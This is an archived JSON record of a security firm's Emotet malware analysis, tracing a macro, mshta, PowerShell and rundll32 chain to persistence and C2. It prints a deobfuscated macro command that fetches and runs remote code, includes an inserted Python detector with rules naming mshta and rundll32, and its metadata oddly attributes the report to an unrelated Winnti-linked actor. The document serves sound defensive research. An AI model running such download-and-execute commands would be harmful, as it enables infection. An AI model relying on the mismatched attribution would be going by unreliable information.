{
	"id": "49a4ed69-5a81-4d3c-b3f0-64d5b34e30cd",
	"created_at": "2026-04-06T00:07:40.506467Z",
	"updated_at": "2026-04-10T03:21:28.855608Z",
	"deleted_at": null,
	"sha1_hash": "6283bc11b7a3c59f8a6fc32595fb15c8e9d56132",
	"title": "Technical Malware Analysis: The return of Emotet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3329465,
	"plain_text": "Technical Malware Analysis: The return of Emotet\r\nBy Anonymous\r\nPublished: 2022-02-13 · Archived: 2026-04-05 21:07:48 UTC\r\nThis post was authored by Taqi, Rosamira and Fareed.\r\nOverview\r\nThe NetbyteSEC malware analyst team came across a Microsoft Excel document containing malicious macro code. The suspicious email was received by one of our clients, and the attachment appears to be Emotet malware, which is often distributed through phishing campaigns.\r\nEmotet is a Trojan that primarily spreads through malicious spam attachments posing as invoices, shipping documents, delivery notifications and the like. The lure may arrive as a malicious script, a macro-enabled document or a malicious link, any of which downloads the Emotet executable when run. Emotet emails often carry familiar branding so that they look like legitimate correspondence and persuade the recipient to open the malicious file.\r\nThe scenario of the analysis is as follows:\r\nFigure 1: Flow of Emotet Attack\r\nEmail analysis\r\nSpearphishing Attachment\r\nThe suspicious attachment in the victim's email is an archive encrypted with the supplied password \"1843\". Because the attachment is encrypted, the Google mail server cannot scan it for viruses. It is normal for an organization to encrypt its attachments, but recipients should be aware that an encrypted attachment received by email can hide malicious content.\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 1 of 14\n\nFigure 2 : Email details\r\nInvestigating the email, the Netbytesec malware analyst noticed that the attackers spoofed the display name to impersonate a legitimate user. 
The email also carried a ZIP attachment containing the attackers' payload.\r\nMalicious document analysis\r\nFurther analysis focuses on the malicious document (XLS) used as the lure inside the password-protected ZIP file.\r\nMD5 Hash: 25995b47257212e2e3ca5f7704c9e830\r\nFilename: untitled_176399.xls\r\nFile Type: Excel Binary File Format (.xls)\r\nOn opening the document, the victim is shown a common cybercriminal lure that asks them to click the “Enable Content” ribbon button in Microsoft Excel, as shown in Figure 3 below. An unsuspecting victim who enables content allows the macro, and with it the malicious script, to run silently in the background without the victim's knowledge.\r\nFigure 3 : Opening the malicious document\r\nEnabling content executes the macro embedded in the lure document, which leads to the malicious macro execution described next.\r\nInvestigating the Excel file, the Netbytesec malware analyst found a malicious Excel 4.0 (XLM) macro stored inside it.\r\nFigure 4 : Results from OleVBA3 against the malicious attachment\r\nAs shown in Figure 4 above, the macro attempts to run an obfuscated form of mshta http://91.240.118.168/oo/aa/se.html via CMD.\r\nNext, the Netbytesec malware analysts performed a VirusTotal lookup for further clues on the IP address found in the macro. Sixteen security vendors on VirusTotal flagged the IP address as malicious, as shown in the following figure.\r\nFigure 5 : 16 security vendors flagged this IP address as malicious.\r\nFurthermore, the VirusTotal community noted that the IP address belongs to a set of IP addresses used in the Emotet malware campaign. 
This convinced the Netbytesec malware analyst that the IP address found in the Excel 4.0 macro is one of the indicators of compromise for the Emotet campaign.\r\nOnce the malicious document (maldoc) is opened and the macro is enabled, the maldoc runs the macro code and downloads se.html, which contains a malicious JavaScript payload. The deobfuscated macro command from the malicious Excel document looks like this:\r\nCMD.EXE /c mshta http://91.240.118.168/oo/aa/se.html\r\nThis command uses mshta.exe, which fetches and executes the HTA code in se.html. Using mshta.exe is a common attacker technique for executing Microsoft HTML Application (HTA) files: as its full name suggests, mshta executes Windows Script Host code (VBScript and JScript) embedded in HTML. In this case se.html carried both a JavaScript and a VBScript payload.\r\nBased on the PCAP analysis, the figure below shows the HTTP request to the server (91.240.118.168) and the response that delivers se.html. What se.html does is explained in the next section.\r\nFigure 6 : The captured network traffic that is generated by the malicious document.\r\nOpening the malicious HTML file (se.html) in a browser shows a page that claims, via a banner, to be protected by HTML Guardian.\r\nFigure 7 : Opening the se.html through the web browser\r\nThe browser's view-source of the page also did not immediately reveal anything more about the HTML content. 
Scrolling down the HTML file, the Netbytesec malware analyst discovered HTML code starting at line 65.\r\nFigure 8 : The content of the html file can be seen started at line 65\r\nThe Netbytesec malware analyst then investigated the payload in se.html and found that it was obfuscated JavaScript.\r\nThe figure below shows the obfuscated JavaScript code recovered from se.html.\r\nFigure 9 : Obfuscated Javascript se.html\r\nInspecting the code shows that most of the script serves the decoy display page and only a small portion carries the malicious payload.\r\nFigure 10 : HTML Structure of se.html\r\nFigure 11 :  VB script contained in an html file.\r\nIn Figure 11 above, the VBScript statement “Window.ReSizeTo 0,0” shrinks the HTA window to zero size so that nothing appears on screen, while the ‘visibility:hidden’ style hides the element and prevents any interaction with it.\r\nFigure 12 : Deobfuscated VB script which leads to an obfuscated Powershell command.\r\nNext, the Netbytesec malware analyst examined the script in the HTML file that executes the obfuscated PowerShell commands and recovered the obfuscated PowerShell payload.\r\nCommand and Scripting Interpreter: Powershell \r\nThe code from Figure 12 is as follows:\r\nFigure 13 : Deobfuscated Powershell code.\r\nFrom the decoded PowerShell, the Netbytesec malware analysts looked up the URL http://91.240.118.168/oo/aa/se.png and found another malicious PowerShell script. 
The se.png file contains PowerShell code, as shown in the figure below.\r\nFigure 14 : Powershell code from se.png that downloads the malicious DLL from one of several websites\r\nAs shown in Figure 14 above, the PowerShell script downloads a DLL from one of the listed URLs and executes it with rundll32.exe.\r\nMalicious DLL analysis\r\nSigned Binary Proxy Execution: Rundll32 \r\nAccording to the PowerShell command, the script downloads the malicious DLL and saves it in the C:\\ProgramData folder as QWER.DLL. The PowerShell command then calls cmd.exe to run rundll32.exe with QWER.DLL as the DLL path and \"AADD\" as an arbitrary export name.\r\nFigure 15: Powershell execution to run malicious DLL files with arbitrary arguments\r\nAs shown in the red box in the figure below, the command that starts the DLL's execution sits at the end of the script.\r\nFigure 16: DLL execution\r\n\"AADD\" is the export name passed when executing QWER.DLL. The name can be anything as long as it is not empty: the first stage runs as soon as rundll32.exe loads the DLL, so the export only needs to be present on the command line, not to exist in the DLL. Once the DLL has loaded, a second execution is triggered.\r\nFigure 17: Rundll32.exe executable running the malicious file with specific arguments, ‘DllRegisterServer’\r\nThe second execution only happens after the first run of the malicious DLL with the arbitrary export name, which serves as the trigger. The second execution is the real entry point of the malicious DLL: it uses cmd.exe to call rundll32.exe with the export name ‘DllRegisterServer’.\r\nThis behavior is visible in the disassembled code: the malware first decrypts (unpacks) its code into the heap and then calls the unpacked code at address 10046FA3, as shown in the figure below. 
\r\nFigure 18: The sample call the unpacked code\r\nThe unpacked (decrypted) code does two main things: it spawns the rundll32 command and then exits the process. The spawned command runs rundll32 with the export name “DllRegisterServer”, which invokes the DLL's “DllRegisterServer” export as the second stage.\r\nIn Figure 19 below, the sample resolves CreateProcessW from kernel32.dll at runtime and calls it, which produces the rundll32 command execution.\r\nFigure 19: QWER.DLL sample import CreateProcessW Windows API\r\nDrilling into the DllRegisterServer export shows what the function does. Its first subroutine unpacks the code into allocated memory and returns the address in the EAX register; that address is then called at 0x10045da0, as shown in the following figure.\r\nFigure 20: DllRegisterServer code\r\nIn this unpacked section the malware connects to three different C2 IP addresses, which are described in the Command and Control (TA0011) section below.\r\nRegistry Run Keys / Startup Folder\r\nTo persist, the malware moves and renames QWER.DLL to a new path with a new arbitrary DLL name and a new arbitrary export argument, and registers that copy to run at startup. The entry is written under HKEY_USERS, the hive that holds user-specific configuration for all currently active users on the computer. 
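\r\nThe chain described above, from the Excel macro to the Run value, lends itself to endpoint detection. The following Python correlator is an added example written for this page, not code from the Netbytesec write-up: it walks constructed Sysmon-style process-creation (Event ID 1) and registry-value (Event ID 13) events and flags an Office application with a script host below it, mshta fetching a remote HTA, rundll32 loading a DLL from a user-writable directory, rundll32 re-launching itself (the DllRegisterServer stage) and a Run value that starts rundll32 on such a DLL. The event field names are a simplified subset of Sysmon's, and the paths, PIDs, SID, DLL names and the benign control event are all assumptions.\r\n

```python
import re

# Constructed Sysmon-style events (id 1 = process create, id 13 = registry
# value set) mirroring the chain described above: Excel -> cmd -> mshta ->
# powershell -> cmd -> rundll32 <arbitrary export> -> cmd -> rundll32
# DllRegisterServer -> HKCU Run value. Paths, PIDs, SID, DLL names and the
# final benign control event are invented for this example.
EVENTS = [
    {'id': 1, 'pid': 100, 'ppid': 1, 'image': 'C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE',
     'cmd': 'EXCEL.EXE untitled_176399.xls'},
    {'id': 1, 'pid': 101, 'ppid': 100, 'image': 'C:\\Windows\\System32\\cmd.exe',
     'cmd': 'CMD.EXE /c mshta http://91.240.118.168/oo/aa/se.html'},
    {'id': 1, 'pid': 102, 'ppid': 101, 'image': 'C:\\Windows\\System32\\mshta.exe',
     'cmd': 'mshta http://91.240.118.168/oo/aa/se.html'},
    {'id': 1, 'pid': 103, 'ppid': 102, 'image': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'cmd': 'powershell -w hidden -enc SQBFAFgA'},
    {'id': 1, 'pid': 104, 'ppid': 103, 'image': 'C:\\Windows\\System32\\cmd.exe',
     'cmd': 'cmd /c rundll32.exe C:\\ProgramData\\QWER.DLL,AADD'},
    {'id': 1, 'pid': 105, 'ppid': 104, 'image': 'C:\\Windows\\System32\\rundll32.exe',
     'cmd': 'rundll32.exe C:\\ProgramData\\QWER.DLL,AADD'},
    {'id': 1, 'pid': 106, 'ppid': 105, 'image': 'C:\\Windows\\System32\\cmd.exe',
     'cmd': 'cmd /c rundll32.exe C:\\ProgramData\\QWER.DLL,DllRegisterServer'},
    {'id': 1, 'pid': 107, 'ppid': 106, 'image': 'C:\\Windows\\System32\\rundll32.exe',
     'cmd': 'rundll32.exe C:\\ProgramData\\QWER.DLL,DllRegisterServer'},
    {'id': 13, 'pid': 107, 'ppid': 106, 'image': 'C:\\Windows\\System32\\rundll32.exe',
     'target': 'HKU\\S-1-5-21-1-2-3-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\gfkq',
     'details': 'rundll32.exe C:\\Users\\victim\\AppData\\Local\\Lkdwp\\ubxg.dll,RvQx'},
    # Benign control: rundll32 loading a DLL from System32 must not alert.
    {'id': 1, 'pid': 200, 'ppid': 1, 'image': 'C:\\Windows\\System32\\rundll32.exe',
     'cmd': 'rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL'},
]

OFFICE = {'excel.exe', 'winword.exe', 'powerpnt.exe', 'outlook.exe'}
SCRIPT_HOSTS = {'cmd.exe', 'mshta.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe', 'rundll32.exe'}
# Directories a standard user can write to; a DLL loaded from here by rundll32 is suspect.
WRITABLE = ('/programdata/', '/appdata/', '/temp/', '/tmp/', '/users/public/')
RUN_KEY = '/software/microsoft/windows/currentversion/run/'
SEP = re.compile(r'[\\\\/]+')
RUNDLL = re.compile('rundll32(?:[.]exe)?\\s+(.+?),\\s*(\\S+)', re.I)

def norm(path):
    # Lower-case and use forward slashes so the rules need no backslash handling.
    return SEP.sub('/', path).lower()

def basename(path):
    return norm(path).rsplit('/', 1)[-1]

def ancestors(ev, by_pid):
    # Walk ppid links upwards and yield the image basename of each ancestor.
    seen = set()
    cur = by_pid.get(ev['ppid'])
    while cur and cur['pid'] not in seen:
        seen.add(cur['pid'])
        yield basename(cur['image'])
        cur = by_pid.get(cur['ppid'])

def rundll32_dll(cmd):
    # Parse rundll32 <dll>,<export> and return (dll, export), or None.
    m = RUNDLL.search(cmd)
    return (m.group(1).strip(), m.group(2)) if m else None

def analyse(events):
    # Return (rule, pid, detail) tuples for every event that matches a rule.
    by_pid = {e['pid']: e for e in events if e['id'] == 1}
    findings = []
    for ev in events:
        img = basename(ev['image'])
        if ev['id'] == 1:
            cmd = ev['cmd']
            chain = list(ancestors(ev, by_pid))
            # Rule 1: a script host anywhere below an Office application.
            if img in SCRIPT_HOSTS and any(a in OFFICE for a in chain):
                findings.append(('office_child', ev['pid'], img))
            # Rule 2: mshta pulling its HTA from a remote URL.
            if img == 'mshta.exe' and re.search(r'https?://', cmd, re.I):
                findings.append(('mshta_remote', ev['pid'], cmd))
            dll = rundll32_dll(cmd) if img == 'rundll32.exe' else None
            # Rule 3: rundll32 loading a DLL from a user-writable directory.
            if dll and any(w in norm(dll[0]) for w in WRITABLE):
                findings.append(('rundll32_writable_dll', ev['pid'], dll[1]))
            # Rule 4: rundll32 descended from rundll32 (the DllRegisterServer re-launch).
            if img == 'rundll32.exe' and 'rundll32.exe' in chain:
                findings.append(('rundll32_respawn', ev['pid'], dll[1] if dll else ''))
        elif ev['id'] == 13 and RUN_KEY in norm(ev['target']):
            # Rule 5: a Run value that starts rundll32 on a DLL in a writable directory.
            dll = rundll32_dll(ev['details'])
            if dll and any(w in norm(dll[0]) for w in WRITABLE):
                findings.append(('run_key_rundll32', ev['pid'], dll[0]))
    return findings

if __name__ == '__main__':
    for rule, pid, detail in analyse(EVENTS):
        print(rule, pid, detail)
```

The office_child rule is deliberately broad and would be tuned against a baseline of legitimate Office add-ins and helpers before it is allowed to page anyone; the other four rules are specific enough to alert on directly, and the benign control event at the end shows that rundll32 with a System32 DLL and DllRegisterServer-style export produces no finding.\r\n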
\r\nFigure 21: Malware attempting to register at Windows startup as a persistence mechanism, alongside the new binary with new arguments at a new path\r\nThe persistence entry makes the malware run whenever the victim uses the machine, via a value under HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.\r\nFigure 22: Again, arbitrary arguments are used to trigger and run the new malicious DLL\r\nFigure 23 : New malware with persistence at boot start-up executing DllRegisterServer\r\nAt this point the malware is fully set up, hidden in a new path and persistent: it runs every time the current user logs on to the machine.\r\nCommand and Control\r\nDuring the investigation, the communication with the C2 server was captured in the Sysmon log as a connection to port 8080.\r\nFigure 24 : Malware communicating with C2 Server of 159.69.43.124:8080\r\nThe TCP connection to 159.69.43.124 on port 8080 is initiated right after the DLL is executed. According to the Sysmon log, the hostname that this IP resolves to is clients.your-server.de.\r\nFigure 25 : Virustotal intelligence confirmed that the IP is used for Emotet Command \u0026 Control server\r\nThe malware uses the Windows API InternetConnectW to open the connection to the C2 server. As the following figure shows, the first connection is to 159.69.43.124 on port 8080, the same endpoint seen in the Sysmon log.\r\nFigure 26 : Malware connection to first  C2 server, 159.69.43.124\r\nObserving the behaviour in the debugger revealed a second C2 connection. 
The second connection goes to a different IP address, 45.79.80.198, on port 443.\r\nFigure 27 : Malware making second connection to another C2 server, 45.79.80.198\r\nThe connection is actually established when the request is sent: the Netbytesec malware analyst observed the network behaviour while stepping over the HttpSendRequest function.\r\nFigure 28 : Malware using HttpSendRequest function\r\nConclusion\r\nThe attacker sent email to the targeted victims with the display name spoofed to a legitimate name, while the sending address itself was unchanged, i.e. the address used by the Emotet campaign agent. In this case the attacker emailed one of the targets using a hijacked email thread. Attached to the email was an Excel file titled ‘untitled_176399.xls’. The file contains a malicious macro that runs the mshta binary to download and execute the next payload from 91.240.118.168.\r\nThat payload downloads a PNG file from the same IP containing a PowerShell payload, which downloads the malicious DLL from one of the domains listed in the indicators below and saves it as C:/ProgramData/QWER.DLL. It then runs rundll32.exe on QWER.DLL with an arbitrary export name. This first execution of QWER.DLL with an arbitrary export name is the trigger for a second execution of QWER.DLL with the specific export name DllRegisterServer, which is the real entry point of the DLL.\r\nThe malicious DLL copies itself to a new arbitrary path under C:/\u003cUsers\u003e/AppData/Local/ with a new arbitrary name and arbitrary arguments and registers itself under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run in the Windows registry. 
As a result, the malicious DLL is persistent and is executed every time the user logs on to the machine. The persistent malware communicates with the C2 server at 159.69.43.124 on port 8080.\r\nIndicators of Compromise\r\nIP addresses\r\n91.240.118[.]168\r\n159.69.43[.]124:8080 (C2 server)\r\n45.79.80[.]198 (C2 server)\r\nURLs\r\nhttp://91.240.118[.]168/oo/aa/se.html\r\nhttp://91.240.118[.]168/oo/aa/se.png\r\nhttp://farmmash[.]com/edh2fa/g2Q7Qbgs/\r\nhttp://karensgardentips[.]com/cgi-bin/hfpv/\r\nhttp://centrobilinguelospinos[.]com/wp-admin/w8528qkQnMPLDUc/\r\nhttp://unitedhorus[.]com/wp-content/m3oxVSV2uYW2rbh/\r\nhttp://vldispatch[.]com/licenses/JE6Ol2dfhrk/\r\nhttp://il-piccolo-principe[.]com/wp-content/Ua9GvD7acXnDz/\r\nhttp://hardstonecap[.]com/well-known/ps9kNMgc6/\r\nhttp://3-fasen[.]com/wp-content/3Bl0hBbW/\r\nhttp://baldcover[.]com/wp-admin/oRwkRUWpbJ55/\r\nHashes\r\n25995b47257212e2e3ca5f7704c9e830 (untitled_176399.xls)\r\n9bf1102cd38dc1364f54407bb4cb2a (se.html)\r\n63f0672552a000605e99190036e9676f (se.png)\r\n74bb69b8ba9d2b649f4de5adb2cf06d9 (QWER.DLL)\r\nSource: https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html"
	],
	"report_names": [
		"technical-malware-analysis-return-of.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434060,
	"ts_updated_at": 1775791288,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6283bc11b7a3c59f8a6fc32595fb15c8e9d56132.pdf",
		"text": "https://archive.orkl.eu/6283bc11b7a3c59f8a6fc32595fb15c8e9d56132.txt",
		"img": "https://archive.orkl.eu/6283bc11b7a3c59f8a6fc32595fb15c8e9d56132.jpg"
	}
}